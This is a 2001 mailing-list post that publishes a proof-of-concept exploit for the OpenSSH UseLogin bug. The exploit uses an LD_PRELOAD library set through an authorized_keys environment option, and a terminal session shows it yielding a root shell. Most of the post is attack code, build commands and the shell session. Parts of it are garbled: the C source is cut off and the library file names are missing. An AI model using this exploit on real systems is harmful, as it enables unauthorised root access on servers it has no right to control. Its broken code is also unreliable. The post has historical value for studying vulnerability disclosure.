OpenSSH UseLogin proof of concept exploit

From: [WaR] (warat_private)
Date: Wed Dec 05 2001 - 16:34:34 PST

  • Next message: Kerry: "Re: IE Denial of service (sorta)"

    --[ OpenSSH UseLogin bug proof of concept exploit ]--
      by [WaR] <warat_private> /
    --[ Intro ]--
     I was very curious in finding out how to exploit this problem. Although
     I don't think anyone uses this feature, I looked into the matter anyway.
     Here it goes. It was tested on the following platforms:
      - Slackware 7.1 with OpenSSH3.0p1
      - RedHat 7.1 with OpenSSH_2.9p2
      - RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
      - OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
     The exploit should work as long as UseLogin does. YMMV.
     This is based on libroot from squidgeat_private,
     published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
     you thought it wouldn't happen again...).
     Kudos to pmsacat_private for his help figuring out the problem with
     the Slackware UseLogin, testing on OpenBSD, and giving the ideia for
     the seteuid(0) (it originally was a system("/bin/sh");).
    --[ Code ]--
     Create a lib.c file with the next content:
     #include <stdio.h>
     int setuid(int uid){
       printf("setuid() called...\n");
     Compile it into a library:
     gcc -c -o lib.o lib.c
     ld -shared -o lib.o
     chmod 755 ./
     Now, for the tricky (*g*) part...
     You must have an account on the machine, and create an entry
     on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
     environment="LD_PRELOAD=<your home>/" <your public key>
     When sshd receives your connection, it will export this variable
     into the environment *BEFORE* running login. Somewhere after this,
     it executes a setuid. When it does, it makes a seteuid(0).
     $ id
     uid=1000(war) gid=100(users) groups=100(users)
     $ ssh war@localhost
     Enter passphrase for key '/home/war/.ssh/id_dsa':
     sh-2.04# id
     uid=0(root) gid=100(users) groups=100(users)
     It also works remotely. Anyway, you _MUST_ have an account on
     the victim machine so you can setup the enviroment, and login.
     And obviously (duh) it must have UseLogin enabled.
     That's all.
     shout outs to Zav @, Smil3r, and everyone at
    -- [WaR]
    "if you can't hack it, hit it with a hammer"

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